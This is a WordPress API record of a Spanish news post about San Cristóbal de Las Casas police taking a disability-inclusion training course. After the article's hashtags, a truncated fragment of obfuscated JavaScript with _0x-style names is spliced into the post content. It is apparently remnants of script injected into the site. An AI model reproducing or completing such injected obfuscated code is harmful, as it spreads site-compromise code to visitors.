{"id":20429,"date":"2025-02-18T04:16:57","date_gmt":"2025-02-18T04:16:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20429"},"modified":"2025-02-18T04:16:57","modified_gmt":"2025-02-18T04:16:57","slug":"policia-municipal-de-san-cristobal-recibe-capacitacion-sobre-inclusion-y-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20429","title":{"rendered":"Polic\u00eda Municipal de San Crist\u00f3bal recibe capacitaci\u00f3n sobre inclusi\u00f3n y discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250217-WA0033-1024x576.jpg\" alt=\"\" class=\"wp-image-20430\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250217-WA0033-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250217-WA0033-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250217-WA0033-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250217-WA0033.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>&#8211; El curso tendr\u00e1 una duraci\u00f3n de cuatro semanas.<br><br>17 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Con el objetivo de fortalecer la inclusi\u00f3n y mejorar la atenci\u00f3n a personas con discapacidad, por instrucciones de la presidenta Municipal de San Crist\u00f3bal de Las Casas, Mtra Fabiola Ricci Diestel elementos de la Direcci\u00f3n de la Polic\u00eda Municipal de San Crist\u00f3bal de Las Casas participaron en el curso de capacitaci\u00f3n \u201cPonte en mi Lugar\u201d, una iniciativa que busca sensibilizar y preparar a los agentes en el trato adecuado a esta poblaci\u00f3n.<\/p>\n\n\n\n<p>Durante la capacitaci\u00f3n, los polic\u00edas reciben informaci\u00f3n sobre los tipos y causas de la discapacidad, estad\u00edsticas, barreras arquitect\u00f3nicas y estrategias para mejorar la accesibilidad.<\/p>\n\n\n\n<p>#AyuntamientoDeSCLC<br>#FabiolaRicciDiestel<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. &#8211; El curso tendr\u00e1 una duraci\u00f3n de cuatro semanas.17 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Con el objetivo de fortalecer la inclusi\u00f3n y mejorar la atenci\u00f3n a personas con discapacidad, por instrucciones de la presidenta Municipal de San Crist\u00f3bal de Las Casas, Mtra Fabiola Ricci Diestel elementos de la Direcci\u00f3n de la Polic\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20430,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20429","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20429","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20429"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20429\/revisions"}],"predecessor-version":[{"id":20431,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20429\/revisions\/20431"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20430"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20429"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20429"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}